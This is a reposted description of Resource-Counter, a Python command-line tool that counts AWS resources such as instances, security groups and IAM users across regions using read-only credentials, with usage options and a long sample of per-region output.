This command line tool counts the number of resources in different categories across Amazon regions.This is a simple Python app that will count resources across different regions and display them on the command line. It first shows the dictionary of the results for the monitored services on a per-region basis, then it shows totals across all regions in a friendlier format. It tries to use the most-efficient query mechanism for each resource in order to manage the impact of API activity. I wrote this to help me scope out assessments and know where resources are in a target account.The development plan is to upgrade the output (probably to CSV file) and to continue to add services. If you have a specific service you want to see added just add a request in the comments.The current list incluides:Application and Network Load BalancersAutoscale GroupsClassic Load BalancersCloudTrail TrailsCloudwatch RulesConfig RulesDynamo TablesElastic IP AddressesGlacier VaultsIAM GroupsImagesInstancesKMS KeysLambda FunctionsLaunch ConfigurationsNAT GatewaysNetwork ACLsIAM PoliciesRDS InstancesIAM RolesS3 BucketsSAML ProvidersSNS TopicsSecurity GroupsSnapshotsSubnetsIAM UsersVPC EndpointsVPC Peering ConnectionVPCsVolumesUsage:To install just copy it where you want it and instally the requirements:pip install -r ./requirements.txtThis was written in Python 3.6.To run:python count_resources.py By default, it will use whatever AWS credentials are alerady configued on the system. You can also specify an access key/secret at runtime and this is not stored. It only neeeds read permissions for the listed services- I use the ReadOnlyAccess managed policy, but you should also be able to use the SecurityAudit policy.Usage: count_resources.py [OPTIONS]Options: –access TEXT AWS Access Key. Otherwise will use the standard credentials path for the AWS CLI. –secret TEXT AWS Secret Key –profile TEXT If you have multiple credential profiles, use this option to specify one. –help Show this message and exit.Sample Output:Establishing AWS session using the profile- dev Current account ID: xxxxxxxxxx Counting resources across regions. This will take a few minutes…Resources by region {‘ap-northeast-1’: {‘instances’: 0, ‘volumes’: 0, ‘security_groups’: 1, ‘snapshots’: 0, ‘images’: 0, ‘vpcs’: 1, ‘subnets’: 3, ‘peering connections’: 0, ‘network ACLs’: 1, ‘elastic IPs’: 0, ‘NAT gateways’: 0, ‘VPC Endpoints’: 0, ‘autoscale groups’: 0, ‘launch configurations’: 0, ‘classic load balancers’: 0, ‘application and network load balancers’: 0, ‘lambdas’: 0, ‘glacier vaults’: 0, ‘cloudwatch rules’: 0, ‘config rules’: 0, ‘cloudtrail trails’: 1, ‘sns topics’: 0, ‘kms keys’: 0, ‘dynamo tables’: 0, ‘rds instances’: 0}, ‘ap-northeast-2’: {‘instances’: 0, ‘volumes’: 0, ‘security_groups’: 1, ‘snapshots’: 0, ‘images’: 0, ‘vpcs’: 1, ‘subnets’: 2, ‘peering connections’: 0, ‘network ACLs’: 1, ‘elastic IPs’: 0, ‘NAT gateways’: 0, ‘VPC Endpoints’: 0, ‘autoscale groups’: 0, ‘launch configurations’: 0, ‘classic load balancers’: 0, ‘application and network load balancers’: 0, ‘lambdas’: 0, ‘glacier vaults’: 0, ‘cloudwatch rules’: 0, ‘config rules’: 0, ‘cloudtrail trails’: 1, ‘sns topics’: 0, ‘kms keys’: 0, ‘dynamo tables’: 0, ‘rds instances’: 0}, ‘ap-south-1’: {‘instances’: 0, ‘volumes’: 0, ‘security_groups’: 1, ‘snapshots’: 0, ‘images’: 0, ‘vpcs’: 1, ‘subnets’: 2, ‘peering connections’: 0, ‘network ACLs’: 1, ‘elastic IPs’: 0, ‘NAT gateways’: 0, ‘VPC Endpoints’: 0, ‘autoscale groups’: 0, ‘launch configurations’: 0, ‘classic load balancers’: 0, ‘application and network load balancers’: 0, ‘lambdas’: 0, ‘glacier vaults’: 0, ‘cloudwatch rules’: 0, ‘config rules’: 0, ‘cloudtrail trails’: 1, ‘sns topics’: 0, ‘kms keys’: 0, ‘dynamo tables’: 0, ‘rds instances’: 0}, ‘ap-southeast-1’: {‘instances’: 0, ‘volumes’: 0, ‘security_groups’: 1, ‘snapshots’: 0, ‘images’: 0, ‘vpcs’: 1, ‘subnets’: 3, ‘peering connections’: 0, ‘network ACLs’: 1, ‘elastic IPs’: 0, ‘NAT gateways’: 0, ‘VPC Endpoints’: 0, ‘autoscale groups’: 0, ‘launch configurations’: 0, ‘classic load balancers’: 0, ‘application and network load balancers’: 0, ‘lambdas’: 0, ‘glacier vaults’: 0, ‘cloudwatch rules’: 0, ‘config rules’: 0, ‘cloudtrail trails’: 1, ‘sns topics’: 0, ‘kms keys’: 0, ‘dynamo tables’: 0, ‘rds instances’: 0}, ‘ap-southeast-2’: {‘instances’: 0, ‘volumes’: 0, ‘security_groups’: 1, ‘snapshots’: 0, ‘images’: 0, ‘vpcs’: 1, ‘subnets’: 3, ‘peering connections’: 0, ‘network ACLs’: 1, ‘elastic IPs’: 0, ‘NAT gateways’: 0, ‘VPC Endpoints’: 0, ‘autoscale groups’: 0, ‘launch configurations’: 0, ‘classic load balancers’: 0, ‘application and network load balancers’: 0, ‘lambdas’: 0, ‘glacier vaults’: 0, ‘cloudwatch rules’: 0, ‘config rules’: 0, ‘cloudtrail trails’: 1, ‘sns topics’: 0, ‘kms keys’: 0, ‘dynamo tables’: 0, ‘rds instances’: 0}, ‘ca-central-1’: {‘instances’: 0, ‘volumes’: 0, ‘security_groups’: 1, ‘snapshots’: 0, ‘images’: 0, ‘vpcs’: 1, ‘subnets’: 2, ‘peering connections’: 0, ‘network ACLs’: 1, ‘elastic IPs’: 0, ‘NAT gateways’: 0, ‘VPC Endpoints’: 0, ‘autoscale groups’: 0, ‘launch configurations’: 0, ‘classic load balancers’: 0, ‘application and network load balancers’: 0, ‘lambdas’: 0, ‘glacier vaults’: 0, ‘cloudwatch rules’: 0, ‘config rules’: 0, ‘cloudtrail trails’: 1, ‘sns topics’: 0, ‘kms keys’: 0, ‘dynamo tables’: 0, ‘rds instances’: 0}, ‘eu-central-1’: {‘instances’: 0, ‘volumes’: 0, ‘security_groups’: 1, ‘snapshots’: 0, ‘images’: 0, ‘vpcs’: 1, ‘subnets’: 3, ‘peering connections’: 0, ‘network ACLs’: 1, ‘elastic IPs’: 0, ‘NAT gateways’: 0, ‘VPC Endpoints’: 0, ‘autoscale groups’: 0, ‘launch configurations’: 0, ‘classic load balancers’: 0, ‘application and network load balancers’: 0, ‘lambdas’: 0, ‘glacier vaults’: 0, ‘cloudwatch rules’: 0, ‘config rules’: 0, ‘cloudtrail trails’: 1, ‘sns topics’: 0, ‘kms keys’: 0, ‘dynamo tables’: 0, ‘rds instances’: 0}, ‘eu-west-1’: {‘instances’: 0, ‘volumes’: 0, ‘security_groups’: 1, ‘snapshots’: 0, ‘images’: 0, ‘vpcs’: 1, ‘subnets’: 3, ‘peering connections’: 0, ‘network ACLs’: 1, ‘elastic IPs’: 0, ‘NAT gateways’: 0, ‘VPC Endpoints’: 0, ‘autoscale groups’: 0, ‘launch configurations’: 0, ‘classic load balancers’: 0, ‘application and network load balancers’: 0, ‘lambdas’: 0, ‘glacier vaults’: 0, ‘cloudwatch rules’: 0, ‘config rules’: 0, ‘cloudtrail trails’: 1, ‘sns topics’: 0, ‘kms keys’: 0, ‘dynamo tables’: 0, ‘rds instances’: 0}, ‘eu-west-2’: {‘instances’: 3, ‘volumes’: 3, ‘security_groups’: 1, ‘snapshots’: 0, ‘images’: 0, ‘vpcs’: 1, ‘subnets’: 3, ‘peering connections’: 0, ‘network ACLs’: 1, ‘elastic IPs’: 0, ‘NAT gateways’: 0, ‘VPC Endpoints’: 0, ‘autoscale groups’: 0, ‘launch configurations’: 0, ‘classic load balancers’: 0, ‘application and network load balancers’: 0, ‘lambdas’: 0, ‘glacier vaults’: 0, ‘cloudwatch rules’: 0, ‘config rules’: 0, ‘cloudtrail trails’: 1, ‘sns topics’: 0, ‘kms keys’: 0, ‘dynamo tables’: 0, ‘rds instances’: 0}, ‘eu-west-3’: {‘instances’: 0, ‘volumes’: 0, ‘security_groups’: 1, ‘snapshots’: 0, ‘images’: 0, ‘vpcs’: 1, ‘subnets’: 3, ‘peering connections’: 0, ‘network ACLs’: 1, ‘elastic IPs’: 0, ‘NAT gateways’: 0, ‘VPC Endpoints’: 0, ‘autoscale groups’: 0, ‘launch configurations’: 0, ‘classic load balancers’: 0, ‘application and network load balancers’: 0, ‘lambdas’: 0, ‘glacier vaults’: 0, ‘cloudwatch rules’: 0, ‘config rules’: 0, ‘cloudtrail trails’: 1, ‘sns topics’: 0, ‘kms keys’: 0, ‘dynamo tables’: 0, ‘rds instances’: 0}, ‘sa-east-1’: {‘instances’: 0, ‘volumes’: 0, ‘security_groups’: 1, ‘snapshots’: 0, ‘images’: 0, ‘vpcs’: 1, ‘subnets’: 3, ‘peering connections’: 0, ‘network ACLs’: 1, ‘elastic IPs’: 0, ‘NAT gateways’: 0, ‘VPC Endpoints’: 0, ‘autoscale groups’: 0, ‘launch configurations’: 0, ‘classic load balancers’: 0, ‘application and network load balancers’: 0, ‘lambdas’: 0, ‘cloudwatch rules’: 0, ‘config rules’: 0, ‘cloudtrail trails’: 1, ‘sns topics’: 0, ‘kms keys’: 0, ‘dynamo tables’: 0, ‘rds instances’: 0}, ‘us-east-1’: {‘instances’: 2, ‘volumes’: 2, ‘security_groups’: 19, ‘snapshots’: 0, ‘images’: 0, ‘vpcs’: 2, ‘subnets’: 3, ‘peering connections’: 0, ‘network ACLs’: 2, ‘elastic IPs’: 0, ‘NAT gateways’: 0, ‘VPC Endpoints’: 0, ‘autoscale groups’: 0, ‘launch configurations’: 0, ‘classic load balancers’: 0, ‘application and network load balancers’: 0, ‘lambdas’: 0, ‘glacier vaults’: 0, ‘cloudwatch rules’: 0, ‘config rules’: 1, ‘cloudtrail trails’: 2, ‘sns topics’: 3, ‘kms keys’: 5, ‘dynamo tables’: 0, ‘rds instances’: 0}, ‘us-east-2’: {‘instances’: 0, ‘volumes’: 0, ‘security_groups’: 2, ‘snapshots’: 0, ‘images’: 0, ‘vpcs’: 1, ‘subnets’: 3, ‘peering connections’: 0, ‘network ACLs’: 1, ‘elastic IPs’: 0, ‘NAT gateways’: 0, ‘VPC Endpoints’: 0, ‘autoscale groups’: 0, ‘launch configurations’: 0, ‘classic load balancers’: 0, ‘application and network load balancers’: 0, ‘lambdas’: 0, ‘glacier vaults’: 0, ‘cloudwatch rules’: 0, ‘config rules’: 0, ‘cloudtrail trails’: 1, ‘sns topics’: 0, ‘kms keys’: 0, ‘dynamo tables’: 0, ‘rds instances’: 0}, ‘us-west-1’: {‘instances’: 1, ‘volumes’: 3, ‘security_groups’: 14, ‘snapshots’: 1, ‘images’: 0, ‘vpcs’: 0, ‘subnets’: 0, ‘peering connections’: 0, ‘network ACLs’: 0, ‘elastic IPs’: 0, ‘NAT gateways’: 0, ‘VPC Endpoints’: 0, ‘autoscale groups’: 0, ‘launch configurations’: 0, ‘classic load balancers’: 0, ‘application and network load balancers’: 0, ‘lambdas’: 0, ‘glacier vaults’: 0, ‘cloudwatch rules’: 0, ‘config rules’: 0, ‘cloudtrail trails’: 1, ‘sns topics’: 0, ‘kms keys’: 1, ‘dynamo tables’: 0, ‘rds instances’: 0}, ‘us-west-2’: {‘instances’: 9, ‘volumes’: 29, ‘security_groups’: 76, ‘snapshots’: 171, ‘images’: 104, ‘vpcs’: 7, ‘subnets’: 15, ‘peering connections’: 1, ‘network ACLs’: 8, ‘elastic IPs’: 7, ‘NAT gateways’: 1, ‘VPC Endpoints’: 0, ‘autoscale groups’: 1, ‘launch configurations’: 66, ‘classic load balancers’: 1, ‘application and network load balancers’: 2, ‘lambdas’: 10, ‘glacier vaults’: 1, ‘cloudwatch rules’: 8, ‘config rules’: 1, ‘cloudtrail trails’: 1, ‘sns topics’: 6, ‘kms keys’: 7, ‘dynamo tables’: 1, ‘rds instances’: 0}}Resource totals across all regions Application and Network Load Balancers : 2 Autoscale Groups : 1 Classic Load Balancers : 1 CloudTrail Trails : 16 Cloudwatch Rules : 8 Config Rules : 2 Dynamo Tables : 1 Elastic IP Addresses : 7 Glacier Vaults : 1 Groups : 12 Images : 104 Instances : 15 KMS Keys : 13 Lambda Functions : 10 Launch Configurations : 66 NAT Gateways : 1 Network ACLs : 22 Policies : 15 RDS Instances : 0 Roles : 40 S3 Buckets : 31 SAML Providers : 1 SNS Topics : 9 Security Groups : 122 Snapshots : 172 Subnets : 51 Users : 14 VPC Endpoints : 0 VPC Peering Connections : 1 VPCs : 21 Volumes : 37Total resources: 796Download Resource-Counter

Link: http://feedproxy.google.com/~r/PentestTools/~3/0QCDjS_vnjY/resource-counter-this-command-line-tool.html